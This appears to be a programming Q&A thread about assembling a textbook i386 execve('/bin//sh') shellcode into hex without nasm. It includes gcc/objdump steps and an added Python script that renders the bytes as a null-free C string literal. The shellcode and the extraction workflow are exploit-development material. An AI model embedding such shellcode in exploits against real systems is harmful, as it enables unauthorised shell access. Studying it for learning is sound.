
I have the following assembly code to spawn a shell from Erickson's exploit book:

; execve(const char *filename, char *const argv [], char *const envp[])
xor eax, eax ; Zero out eax.
push eax ; Push some nulls for string termination.
push 0x68732f2f ; Push "//sh" to the stack.
push 0x6e69622f ; Push "/bin" to the stack.
mov ebx, esp ; Put the address of "/bin//sh" into ebx, via esp.
push eax ; Push 32-bit null terminator to stack.
mov edx, esp ; This is an empty array for envp.
push ebx ; Push string addr to stack above null terminator.
mov ecx, esp ; This is the argv array with string ptr.
mov al, 11 ; Syscall #11.
int 0x80 ; Do it.

However, my Linux machine doesn't have nasm and to get it requires me to fetch my administrator to download the package. Are there any other ways to get this into hex? I know GCC uses AT&T, but I don't know of any methods that support Intel x86.

Kurt Wagner
  • See http://stackoverflow.com/questions/9347909/can-i-use-intel-syntax-of-x86-assembly-with-gcc If that doesn't work and you feel it's too much hassle to get your admin to let you download nasm, you could just rewrite the code in AT&T syntax. – Michael Dec 02 '14 at 08:37
  • Forgive my Linux foo, but would that be `gcc assem.s -masm=intel objFileToGetHexed.o`? I'm running across a `No such file or directory` for the .o file which doesn't make sense to me... – Kurt Wagner Dec 02 '14 at 08:53
  • No, I believe you'd add that in your source file. – Michael Dec 02 '14 at 08:54
  • Can't you install `nasm`, perhaps compiling it from source code and installing it in your private directory (e.g. your `$HOME/bin/`) ?? – Basile Starynkevitch Dec 02 '14 at 10:40

2 Answers


Maybe an online assembler can help:
http://www2.onlinedisassembler.com/odaweb/
https://defuse.ca/online-x86-assembler.htm


To get only a hex-dump you don't need a valid executable. In your case (no relocations) I see no problem assembling the code at home with your assembler on your operating system, getting the hex-dump and using it on the target system. Just take care of the architecture (i386 or x86_64).

Here are the steps to get the hex-dump on Linux:

`test.s` (lowercase `.s`)

.intel_syntax noprefix
.text
.global _start
_start:

xor eax, eax # Zero out eax.
push eax # Push some nulls for string termination.
push 0x68732f2f # Push "//sh" to the stack.
push 0x6e69622f # Push "/bin" to the stack.
mov ebx, esp # Put the address of "/bin//sh" into ebx, via esp.
push eax # Push 32-bit null terminator to stack.
mov edx, esp # This is an empty array for envp.
push ebx # Push string addr to stack above null terminator.
mov ecx, esp # This is the argv array with string ptr.
mov al, 11 # Syscall #11.
int 0x80 # Do it.

Consider changing the comment sign from `;` to `#`.

Build and get the hex-dump:

gcc -m32 -c test.s
objdump -F -s -j.text test.o

You can also use `gdb test.o` and `disass/r _start`.

rkhb
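As an added example (not part of either answer), here is a small Python script that turns the `objdump -s -j .text test.o` output from the answer above into raw bytes, prints them in the usual `"\x.."` literal form, and reports the byte count and any 0x00 bytes. The sample dump embedded in it is constructed: it assumes the 25 bytes are the standard i386 encodings of the eleven posted instructions, so compare it against the dump your own objdump produces. The zero-byte check is there because the posted code deliberately uses `mov al, 11` rather than `mov eax, 11`; it confirms that the extracted bytes still have that property after copying them between machines.

```python
import re

# Constructed sample input: what `objdump -s -j .text test.o` prints for the
# object assembled from the answer's test.s. The hex bytes are the standard
# i386 encodings of those eleven instructions (assumption: check against your
# own objdump output).
SAMPLE_OBJDUMP = (
    "test.o:     file format elf32-i386\n"
    "\n"
    "Contents of section .text:\n"
    " 0000 31c05068 2f2f7368 682f6269 6e89e350  1.Ph//shh/bin..P\n"
    " 0010 89e25389 e1b00bcd 80" + " " * 17 + "..S......\n"
)

# A dump line: optional spaces, hex offset, one space, then a 35-column hex
# area (four groups of up to eight hex digits, blank padded). The ASCII
# column after it is ignored on purpose: it can itself look like hex digits,
# so slicing by position is safer than splitting on whitespace.
DUMP_LINE = re.compile(r"^\s*([0-9a-fA-F]+) (.{0,35})")


def parse_objdump_section(text):
    """Return the raw bytes of the section shown in an `objdump -s` dump.

    Only lines after a "Contents of section" header are read, and the offsets
    must be contiguous, so a truncated or reordered paste is rejected instead
    of silently yielding the wrong bytes.
    """
    data = bytearray()
    in_section = False
    for line in text.splitlines():
        if line.startswith("Contents of section"):
            in_section = True
            continue
        if not in_section or not line.strip():
            continue
        m = DUMP_LINE.match(line)
        if not m:
            raise ValueError("unexpected dump line: %r" % line)
        offset = int(m.group(1), 16)
        if offset != len(data):
            raise ValueError("non-contiguous offset 0x%x, expected 0x%x"
                             % (offset, len(data)))
        data += bytes.fromhex(m.group(2).replace(" ", ""))
    if not data:
        raise ValueError("no section contents found")
    return bytes(data)


def find_zero_bytes(data):
    """Offsets of 0x00 bytes in the extracted code.

    The posted code is written to contain none (mov al, 11 instead of
    mov eax, 11); a zero byte would end a C string and truncate anything
    copied with strcpy-style functions, so it is worth confirming.
    """
    return [i for i, b in enumerate(data) if b == 0]


def to_c_string(data, per_line=8):
    """Render the bytes as "\\x31\\xc0..." literals, per_line bytes per line,
    ready to paste into a C char array."""
    chunks = ["".join("\\x%02x" % b for b in data[i:i + per_line])
              for i in range(0, len(data), per_line)]
    return "\n".join('"%s"' % c for c in chunks)


if __name__ == "__main__":
    code = parse_objdump_section(SAMPLE_OBJDUMP)
    print("%d bytes of .text" % len(code))
    print(to_c_string(code))
    zeros = find_zero_bytes(code)
    print("zero bytes at:", zeros if zeros else "none")
```

To use it on your own object, run `objdump -s -j .text test.o > dump.txt` on the build machine and pass the file's contents to `parse_objdump_section`; if you paste the dump by hand, keep the column padding, since the parser slices the hex area by position.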